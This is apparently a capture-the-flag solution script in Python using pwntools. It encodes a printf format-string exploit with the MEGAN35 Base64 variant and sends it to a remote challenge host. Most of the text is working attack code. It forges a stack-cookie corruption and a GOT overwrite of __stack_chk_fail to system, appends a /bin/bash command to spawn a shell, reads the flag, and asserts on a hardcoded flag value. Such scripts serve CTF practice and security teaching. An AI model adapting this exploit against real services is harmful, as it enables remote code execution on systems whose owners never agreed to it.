#!/usr/bin/pythonimport base64import sysfrom pwn import *# MEGAN35 DEC

1. #!/usr/bin/python
2. import base64
3. import sys
4. from pwn import *
5.  
6. # MEGAN35 DECODER, GOTO LINE 44
7. megan35 = "3GHIJKLMNOPQRSTUb=cdefghijklmnopWXYZ/12+406789VaqrstuvwxyzABCDEF5"
8. atom128 = "/128GhIoPQROSTeUbADfgHijKLM+n0pFWXY456xyzB7=39VaqrstJklmNuZvwcdEC"
9. zong22 = "ZKj9n+yf0wDVX1s/5YbdxSo=ILaUpPBCHg8uvNO4klm6iJGhQ7eFrWczAMEq3RTt2"
10. hazz15 = "HNO4klm6ij9n+J2hyf0gzA8uvwDEq3X1Q7ZKeFrWcVTts/MRGYbdxSo=ILaUpPBC5"
11. base = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
12.  
13. class B64VariantEncoder:
14.     def __init__(self, translation):
15.         base = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
16.         self.lookup = dict(zip(base, translation))
17.         self.revlookup = dict(zip(translation, base))
18.  
19.     def encode(self, text):
20.         global lookup
21.         b64 = base64.b64encode(text)
22.         result = "".join([self.lookup[x] for x in b64])
23.         return result
24.  
25.     def decode(self, code):
26.         global revlookup
27.         b64 = "".join([self.revlookup[x] for x in code])
28.         result = base64.b64decode(b64)
29.         return result
30.  
31. def encode(variant, text):
32.     encoder = B64VariantEncoder(variant)
33.     return encoder.encode(text)
34.  
35. def decode(variant, code):
36.     try:
37.         encoder = B64VariantEncoder(variant)
38.         return encoder.decode(code)
39.     except KeyError:
40.         return "no valid encoding"
41.     except TypeError:
42.         return "no correct padding"
43.  
44. # Basic idea of attack, corrupt stack cookie, overwrite __stack_check_fail in GOT
45. STACK_COOKIE = 0xffffddd0-52 # leaked stack address, found offset to cookie
46. FAIL_GOT=0x804A018
47. TARGET=0xf7e38940 # target address of system in libc, accounted for 0x1b000 page offset
48.  
49. # overwrite both GOT address and stack cookie using %(h){1-2}n printf
50. payload=p32(STACK_COOKIE) # 71
51. payload+=p32(FAIL_GOT)    # 72
52. payload+=p32(FAIL_GOT+1)  # 73
53. payload+=p32(FAIL_GOT+2)  # 74
54. payload+=p32(FAIL_GOT+3)  # 75
55. payload+="%71$n" # corrupt cookie
56. payload+="%37x"
57. payload+="%73$hhn"
58. payload+="       "
59. payload+="%72$hhn"
60. payload+="%165x"
61. payload+="%74$hhn"
62. payload+="%18x" # overwrite got address
63. payload+="%75$hhn;/bin/bash" # run /bin/bash
64.  
65. # some debug output
66. log.warn("Stack cookie at {0}".format(hex(STACK_COOKIE)))
67.  
68. # megan35 encode the payload
69. sendit = encode(megan35, payload)
70.  
71. #send ittttttttttttt
72. p = remote("megan35.stillhackinganyway.nl", 3535)
73. p.sendline(sendit)
74. p.recv(1024) # payload output
75. p.recv(1024) # shell error
76. p.sendline("\n\ncat flag")
77. flag = p.recv(1024)
78.  
79. assert ("flag{43eb404b714b8d22e1168775eba1669c}" in flag)
80. log.info("{0}".format(flag))
81.  
82. p.close()